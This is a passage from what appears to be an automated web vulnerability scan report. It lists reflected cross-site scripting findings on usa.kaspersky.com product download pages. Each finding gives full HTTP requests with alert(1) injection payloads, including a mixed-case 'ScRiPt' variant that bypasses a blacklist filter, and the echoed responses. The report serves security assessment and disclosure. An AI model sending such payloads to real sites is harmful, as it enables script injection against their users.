s.pageName="404:http://usa.kaspersky.com/downloadsc05ef"-alert(1)-"db233ee5bea/product-downloads/kaspersky-anti-virus";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.89. http://usa.kaspersky.com/downloads/product-downloads/kaspersky-anti-virus [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/product-downloads/kaspersky-anti-virus

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee00c"-alert(1)-"4d6e64bab5e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /downloads/product-downloadsee00c"-alert(1)-"4d6e64bab5e/kaspersky-anti-virus HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:35:18 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686518"
Content-Type: text/html; charset=utf-8
Content-Length: 39218
Date: Sat, 18 Dec 2010 15:35:32 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
hank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/downloads/product-downloadsee00c"-alert(1)-"4d6e64bab5e/kaspersky-anti-virus";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.90. http://usa.kaspersky.com/downloads/product-downloads/kaspersky-anti-virus [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/product-downloads/kaspersky-anti-virus

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4954"><script>alert(1)</script>de9b93b8ccd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/product-downloadsa4954"><script>alert(1)</script>de9b93b8ccd/kaspersky-anti-virus HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:34:55 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686495"
Content-Type: text/html; charset=utf-8
Content-Length: 30463
Date: Sat, 18 Dec 2010 15:35:03 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/downloads/product-downloadsa4954"><script>alert(1)</script>de9b93b8ccd/kaspersky-anti-virus" />
...[SNIP]...

1.91. http://usa.kaspersky.com/downloads/product-downloads/kaspersky-anti-virus [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/product-downloads/kaspersky-anti-virus

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f9f6"><script>alert(1)</script>60160198abd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/product-downloads/kaspersky-anti-virus7f9f6"><script>alert(1)</script>60160198abd HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:37:22 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686642"
Content-Type: text/html; charset=utf-8
Content-Length: 30463
Date: Sat, 18 Dec 2010 15:37:28 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/downloads/product-downloads/kaspersky-anti-virus7f9f6"><script>alert(1)</script>60160198abd" />
...[SNIP]...

1.92. http://usa.kaspersky.com/downloads/product-downloads/kaspersky-anti-virus [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/product-downloads/kaspersky-anti-virus

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6284"-alert(1)-"cd729dd64f3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /downloads/product-downloads/kaspersky-anti-virusb6284"-alert(1)-"cd729dd64f3 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:37:45 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686665"
Content-Type: text/html; charset=utf-8
Content-Length: 39352
Date: Sat, 18 Dec 2010 15:37:52 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
me = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/downloads/product-downloads/kaspersky-anti-virusb6284"-alert(1)-"cd729dd64f3";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.93. http://usa.kaspersky.com/downloads/product-downloads/kaspersky-anti-virus [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/product-downloads/kaspersky-anti-virus

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c833b"><script>alert(1)</script>45ffef6aa7b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/product-downloads/kaspersky-anti-virus?c833b"><script>alert(1)</script>45ffef6aa7b=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:30:06 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686206"
Content-Type: text/html; charset=utf-8
Content-Length: 32669
Date: Sat, 18 Dec 2010 15:30:17 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/downloads/product-downloads/kaspersky-anti-virus?c833b"><script>alert(1)</script>45ffef6aa7b=1" />
...[SNIP]...

1.94. http://usa.kaspersky.com/downloads/product-downloads/kaspersky-internet-security [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/product-downloads/kaspersky-internet-security

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c2b0"><ScRiPt>alert(1)</ScRiPt>602c511cf71 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /downloads1c2b0"><ScRiPt>alert(1)</ScRiPt>602c511cf71/product-downloads/kaspersky-internet-security HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:33:32 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686412"
Content-Type: text/html; charset=utf-8
Content-Length: 30379
Date: Sat, 18 Dec 2010 15:33:40 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/downloads1c2b0"><ScRiPt>alert(1)</ScRiPt>602c511cf71/product-downloads/kaspersky-internet-security" />
...[SNIP]...

1.95. http://usa.kaspersky.com/downloads/product-downloads/kaspersky-internet-security [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/product-downloads/kaspersky-internet-security

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82617"-alert(1)-"1aa55c13d19 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /downloads82617"-alert(1)-"1aa55c13d19/product-downloads/kaspersky-internet-security HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:33:59 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686439"
Content-Type: text/html; charset=utf-8
Content-Length: 39785
Date: Sat, 18 Dec 2010 15:34:04 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/downloads82617"-alert(1)-"1aa55c13d19/product-downloads/kaspersky-internet-security";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.96. http://usa.kaspersky.com/downloads/product-downloads/kaspersky-internet-security [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/product-downloads/kaspersky-internet-security

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4036c"><ScRiPt>alert(1)</ScRiPt>25e51537b22 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /downloads/product-downloads4036c"><ScRiPt>alert(1)</ScRiPt>25e51537b22/kaspersky-internet-security HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:35:47 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686547"
Content-Type: text/html; charset=utf-8
Content-Length: 30505
Date: Sat, 18 Dec 2010 15:35:58 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/downloads/product-downloads4036c"><ScRiPt>alert(1)</ScRiPt>25e51537b22/kaspersky-internet-security" />
...[SNIP]...

1.97. http://usa.kaspersky.com/downloads/product-downloads/kaspersky-internet-security [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/product-downloads/kaspersky-internet-security

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53f46"-alert(1)-"a567447b087 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /downloads/product-downloads53f46"-alert(1)-"a567447b087/kaspersky-internet-security HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:36:19 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686579"
Content-Type: text/html; charset=utf-8
Content-Length: 39911
Date: Sat, 18 Dec 2010 15:36:24 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
hank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/downloads/product-downloads53f46"-alert(1)-"a567447b087/kaspersky-internet-security";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.98. http://usa.kaspersky.com/downloads/product-downloads/kaspersky-internet-security [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/product-downloads/kaspersky-internet-security

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85c4c"><ScRiPt>alert(1)</ScRiPt>3ce8337358c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /downloads/product-downloads/kaspersky-internet-security85c4c"><ScRiPt>alert(1)</ScRiPt>3ce8337358c HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:38:01 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686681"
Content-Type: text/html; charset=utf-8
Content-Length: 30505
Date: Sat, 18 Dec 2010 15:38:06 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/downloads/product-downloads/kaspersky-internet-security85c4c"><ScRiPt>alert(1)</ScRiPt>3ce8337358c" />
...[SNIP]...

1.99. http://usa.kaspersky.com/downloads/product-downloads/kaspersky-internet-security [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/product-downloads/kaspersky-internet-security

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e059"-alert(1)-"0a43eaff6cd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /downloads/product-downloads/kaspersky-internet-security3e059"-alert(1)-"0a43eaff6cd HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:38:22 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686702"
Content-Type: text/html; charset=utf-8
Content-Length: 39465
Date: Sat, 18 Dec 2010 15:38:30 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/downloads/product-downloads/kaspersky-internet-security3e059"-alert(1)-"0a43eaff6cd";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.100. http://usa.kaspersky.com/downloads/product-downloads/kaspersky-internet-security [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/product-downloads/kaspersky-internet-security

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7286d"><script>alert(1)</script>190a524aac6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/product-downloads/kaspersky-internet-security?7286d"><script>alert(1)</script>190a524aac6=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:30:09 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686209"
Content-Type: text/html; charset=utf-8
Content-Length: 32807
Date: Sat, 18 Dec 2010 15:30:21 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/downloads/product-downloads/kaspersky-internet-security?7286d"><script>alert(1)</script>190a524aac6=1" />
...[SNIP]...

1.101. http://usa.kaspersky.com/downloads/product-downloads/mobile-security [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/product-downloads/mobile-security

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c29b"><script>alert(1)</script>b59c5579f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads2c29b"><script>alert(1)</script>b59c5579f7/product-downloads/mobile-security HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
